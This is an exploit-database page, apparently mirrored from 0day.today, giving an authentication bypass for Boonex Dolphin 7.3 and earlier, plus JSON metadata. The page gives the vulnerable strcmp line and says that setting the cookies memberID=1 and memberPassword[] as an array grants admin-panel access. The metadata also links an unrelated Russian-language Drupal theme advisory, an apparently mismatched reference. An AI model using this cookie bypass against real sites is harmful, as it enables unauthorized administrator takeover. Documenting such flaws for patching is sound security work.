Search...

Boonex Dolphin 7.3.2 - Authentication Bypass Vulnerability

2016-10-26T00:00:00

ID 1337DAY-ID-26140
Type zdt
Reporter Saadi Siddiqui
Modified 2016-10-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title     : Boonex Dolphin all versoin &lt;= 7.3 Authentication Bypass
# Exploit Author    : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link     : https://www.boonex.com
# Author HomePage   : http://security-geeks.blogspot.com
  
 
Proof of Concept
 
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
  
$passwd is equal to Cookie parameter memberpassword
  
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
  
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah ---&gt;array
  
This will allow the attacker to bypass the authentication and can also enter in admin panel.
  
#Independent Pakistani Security Researcher

#  0day.today [2018-02-15]  #

JSON Vulners Source

Initial Source

{"href": "https://0day.today/exploit/description/26140", "history": [], "sourceData": "# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass\r\n# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com\r\n# Software Link : https://www.boonex.com\r\n# Author HomePage : http://security-geeks.blogspot.com\r\n \r\n \r\nProof of Concept\r\n \r\nFile: admin.inc.php\r\nLine: 187\r\nCode: (strcmp($aProfile['Password'], $passwd) != 0)\r\n \r\n$passwd is equal to Cookie parameter memberpassword\r\n \r\nBug:\r\nAccording to PHP documentation strcmp will compare strings, but what if we provide an array???\r\n \r\nSo, simple bypass is to put two cookies in browser\r\nmemberID=1\r\nmemberPassword[]=blah --->array\r\n \r\nThis will allow the attacker to bypass the authentication and can also enter in admin panel.\r\n \r\n#Independent Pakistani Security Researcher\n\n# 0day.today [2018-02-15] #", "bulletinFamily": "exploit", "modified": "2016-10-26T00:00:00", "title": "Boonex Dolphin 7.3.2 - Authentication Bypass Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://0day.today/exploit/26140", "cvelist": [], "description": "Exploit for php platform in category web applications", "viewCount": 6, "published": "2016-10-26T00:00:00", "edition": 1, "hash": "4d0fba862cb7ad8ed63cf6cacd11d14aa801ae3d00f3c13e4a0611b93d211cff", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "bd3875aba5a186d6217dbc2622e82549"}, {"key": "modified", "hash": "1d731490b777bc15c5d9375993128995"}, {"key": "published", "hash": "1d731490b777bc15c5d9375993128995"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "528d549491126d98e2fa728930bd3f2a"}, {"key": "sourceData", "hash": "4c74bf306793827b4b31df7537052c00"}, {"key": "sourceHref", "hash": "f88c4c4a3fdf2783d85131927808d923"}, {"key": "title", "hash": "af7fba3ec34d1b23f7b09f67b577419e"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "id": "1337DAY-ID-26140", "type": "zdt", "lastseen": "2018-02-16T01:18:01", "reporter": "Saadi Siddiqui", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-02-16T01:18:01"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26140"]}], "modified": "2018-02-16T01:18:01"}, "vulnersScore": 0.4}, "objectVersion": "1.3", "references": []}

{"securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2011-04-17T00:00:00", "published": "2011-04-17T00:00:00", "id": "SECURITYVULNS:VULN:11600", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11600", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435 3APA3A!\r\n\r\n\u0421\u043e\u043e\u0431\u0449\u0430\u044e \u0432\u0430\u043c \u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u043c\u043d\u043e\u044e Cross-Site Scripting, Full path\r\ndisclosure, Abuse of Functionality \u0438 Denial of Service \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432\u043e\r\n\u043c\u043d\u043e\u0433\u0438\u0445 \u0442\u0435\u043c\u0430\u0445 \u0434\u043b\u044f Drupal.\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0442\u0435\u043c\u044b \u0434\u043b\u044f Drupal: Fresh News, Inspire,\r\nSpectrum, Delegate, Optimize, Bueno, Headlines, Daily Edition, Coffee\r\nBreak, The Gazette Edition. \u042d\u0442\u043e \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438\u0435 \u0448\u0430\u0431\u043b\u043e\u043d\u044b \u0434\u043b\u044f Drupal \u043e\u0442\r\nWooThemes.\r\n\r\nCross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse\r\nof Functionality (WASC-42) \u0438 Denial of Service (WASC-10) \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\r\n\u0434\u0430\u043d\u043d\u044b\u0445 \u0442\u0435\u043c\u0430\u0445 \u0442\u0430\u043a\u0438\u0435 \u0436\u0435 \u0441\u0430\u043c\u044b\u0435 \u043a\u0430\u043a \u0438 \u0432 \u0440\u0430\u043d\u0435\u0435 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 90 \u0442\u0435\u043c\u0430\u0445 \u0434\u043b\u044f\r\nWordPress \u043e\u0442 \u0434\u0432\u0443\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432. \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0435 \u0448\u0430\u0431\u043b\u043e\u043d\u044b \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\r\nTimThumb, \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u044f \u043f\u0438\u0441\u0430\u043b \u0440\u0430\u043d\u0435\u0435\r\n(http://websecurity.com.ua/4910/).\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0441 TimThumb 1.24 \u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u043c\u0438\r\n\u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438. \u041a\u0440\u043e\u043c\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0442\u0435\u043c \u043e\u0442 WooThemes \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c\r\n\u0434\u0440\u0443\u0433\u0438\u0435 \u0442\u0435\u043c\u044b \u0434\u043b\u044f Drupal (\u0441 TimThumb) \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 (\u0438 \u0442\u0430\u043a\u0438\u0445\r\n\u0442\u0435\u043c \u043d\u0435\u043c\u0430\u043b\u043e). \u0415\u0441\u043b\u0438 \u0432 \u0448\u0430\u0431\u043b\u043e\u043d\u0430\u0445 \u043e\u0442 WooThemes \u0444\u0430\u0439\u043b \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f thumb.php,\r\n\u0442\u043e \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u0448\u0430\u0431\u043b\u043e\u043d\u0430\u0445 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u0430, \u0432\r\n\u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438 timthumb.php. \r\n\r\n\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0443 \u043c\u0435\u043d\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435:\r\nhttp://websecurity.com.ua/4982/\r\n\r\nBest wishes & regards,\r\nMustLive\r\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0441\u0430\u0439\u0442\u0430\r\nhttp://websecurity.com.ua", "modified": "2011-04-17T00:00:00", "published": "2011-04-17T00:00:00", "id": "SECURITYVULNS:DOC:26140", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26140", "title": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0442\u0435\u043c\u0430\u0445 \u0434\u043b\u044f Drupal", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}